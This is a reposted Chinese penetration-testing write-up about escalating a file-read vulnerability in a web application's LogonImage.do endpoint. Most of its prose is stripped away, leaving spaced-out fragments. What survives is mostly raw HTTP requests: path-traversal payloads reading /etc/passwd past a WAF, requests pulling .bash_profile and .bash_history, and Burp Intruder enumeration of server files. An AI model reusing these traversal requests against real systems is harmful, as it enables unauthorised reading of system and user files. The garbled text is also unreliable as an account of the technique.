[16276] 2021-01-03_一次文件读取漏洞的“危害升级”历程

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-18
2021-01-03_一次文件读取漏洞的“危害升级”历程 A e d o o o   F r e e B u f   2 0 2 1 - 0 1 - 0 3 A P P P S 0 x 0 0   A P P A P P G E T G E T   / i x x x / L g o n I m a g e . d o ? X x x x x I m a g e D i r = / X X X X X / P i c t u r e s & S a v e X x x x x I m a g e N a m e = t h i s _ i s _ i m a g e . j p g   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8
U R I 0 x 0 1   S a v e X x x x x I m a g e N a m e / X X X X X / P i c t u r e s P a y l o a d L o g o n I m a g e D i r = / X X X X X / P i c t u r e s   -   S a v e X x x x x I m a g e N a m e = t h i s _ i s _ i m a g e . j p g   -   G E T   / i x x x / L o g o n I m a g e . d o ? X x x x x I m a g e D i r = / X X X X X / P i c t u r e s & S a v e X x x x x I m a g e N a m e =   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8 G E T   / i x x x / L o g o n I m a g e . d o ? X x x x x I m a g e D i r = / X X X X X / P i c t u r e s / . . / . . / . . / . . / . . / . . / e t c / & S a v e X x x x x I m a g e N a m e = p a s s w d   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0
/ e t c / p a s s w d W A F / . . / W A F / e t c / p a s s w d / . . / W A F U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8 G E T   / i x x x / L o g o n I m a g e . d o ? X x x x x I m a g e D i r = / X X X X X / P i c t u r e s / . . / & S a v e X x x x x I m a g e N a m e =   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8
P O S T 使 P O S T W A F U R L P O S T G E T P O S T W A F W A F . . 0 x 0 2   W A F . b a s h _ h i s t o r y . b a s h _ p r o f i l e . b a s h _ h i s t o r y . b a s h _ l o g o u t . b a s h r c b a s h   s h e l l b a s h   s h e l l . b a s h _ p r o f i l e p a y l o a d W A F . b a s h G E T   / i x x x / L o g o n I m a g e . d o ? X x x x x I m a g e D i r = / & S a v e X x x x x I m a g e N a m e = . b a s h _ p r o f i l e   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8
0 x 0 3   . b a s h _ h i s t o r y . b a s h _ h i s t o r y c d / N x x x x / x x F i l e / x x _ 2 0 2 0 1 0 2 2 _ 5 1 x x x . t x t G E T   / i x x x / L o g o n I m a g e . d o ? X x x x x I m a g e D i r = / & S a v e X x x x x I m a g e N a m e = . b a s h _ h i s t o r y   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8
I D + I D B u r p s u i t e   I n t r u d e r 1 0 I D G E T   / i x x x / L o g o n I m a g e . d o ? X x x x x I m a g e D i r = / N x x x x / x x F i l e & S a v e X x x x x I m a g e N a m e = x x _ 2 0 2 0 1 0 2 2 _ 5 1 x x x . t x t   H T T P / 1 . 1 H o s t :   x x x x x . c o m C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , e n - U S ; q = 0 . 8
0 x 0 4   W A F L i n u x . b a s h _ h i s t o r y 西 ~

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则